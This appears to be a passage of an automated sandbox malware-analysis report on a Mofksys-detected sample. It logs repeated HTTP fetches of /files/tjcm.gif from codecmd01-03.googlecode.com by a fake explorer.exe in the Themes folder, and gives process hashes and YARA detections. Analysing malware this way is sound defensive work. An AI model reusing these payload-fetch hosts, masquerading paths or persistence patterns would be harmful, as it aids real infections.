                                                                                                                                                                                34192.168.2.549892142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:27.798254967 CEST2750OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
Jul 16, 2022 23:58:27.825057983 CEST  2751  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:27 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:27.825083971 CEST  2751  IN  Data Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
35          192.168.2.5  49896        142.250.102.82  80                C:\Windows\Resources\Themes\explorer.exe
Timestamp  kBytes transferred  Direction  Data
Jul 16, 2022 23:58:31.401536942 CEST  2765  OUT  GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
Jul 16, 2022 23:58:31.428580046 CEST  2766  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:31 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:31.428608894 CEST  2767  IN  Data Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
36          192.168.2.5  49899        142.250.102.82  80                C:\Windows\Resources\Themes\explorer.exe
Timestamp  kBytes transferred  Direction  Data
Jul 16, 2022 23:58:35.080053091 CEST  9381  OUT  GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
Jul 16, 2022 23:58:35.122745991 CEST  9382  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:35 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:35.122762918 CEST  9382  IN  Data Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
37          192.168.2.5  49901        142.250.102.82  80                C:\Windows\Resources\Themes\explorer.exe
Timestamp  kBytes transferred  Direction  Data
Jul 16, 2022 23:58:39.042984962 CEST  9390  OUT  GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
Jul 16, 2022 23:58:39.070574999 CEST  9391  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:39 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:39.070605040 CEST9392INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49810 | 49.12.130.236 | 80 | C:\Users\user\Desktop\sj9q8uwmax.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49820 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:29.528261900 CEST | 1981 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:57:29.558214903 CEST | 1984 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:29 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49832 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:33.892160892 CEST | 2206 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:57:33.918724060 CEST | 2207 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:33 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49845 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:40.987526894 CEST | 2440 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:57:41.016335964 CEST | 2441 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:40 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 
70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:41.016365051 CEST | 2441 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                8 | 192.168.2.5 | 49851 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                Jul 16, 2022 23:57:42.486418009 CEST | 2536 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:42.513360023 CEST | 2537 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:42 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:42.513382912 CEST | 2538 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                9 | 192.168.2.5 | 49855 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                Jul 16, 2022 23:57:43.815694094 CEST | 2608 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:43.842459917 CEST | 2610 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:43 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:43.842511892 CEST | 2610 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:23:56:37
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Users\user\Desktop\sJ9Q8UWMAX.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\sJ9Q8UWMAX.exe"
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:3987229 bytes
                                                                                                                                                                                MD5 hash:7FDB00C80F0250575A05601C08627D50
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000000.435290439.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:1
                                                                                                                                                                                Start time:23:56:41
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\users\user\desktop\sj9q8uwmax.exe
                                                                                                                                                                                Imagebase:0x3d0000
                                                                                                                                                                                File size:3848888 bytes
                                                                                                                                                                                MD5 hash:871EB4B8AEFAEA1113DD3F08B7CB535C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:2
                                                                                                                                                                                Start time:23:56:47
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138316 bytes
                                                                                                                                                                                MD5 hash:0A9BDF90EF50DEF16C6D4C363D0F0B9C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000002.00000002.490867469.0000000000402000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000002.00000000.456086983.0000000000401000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:3
                                                                                                                                                                                Start time:23:56:51
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"c:\users\user\desktop\sj9q8uwmax.exe " --local-service
                                                                                                                                                                                Imagebase:0x3d0000
                                                                                                                                                                                File size:3848888 bytes
                                                                                                                                                                                MD5 hash:871EB4B8AEFAEA1113DD3F08B7CB535C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:5
                                                                                                                                                                                Start time:23:56:51
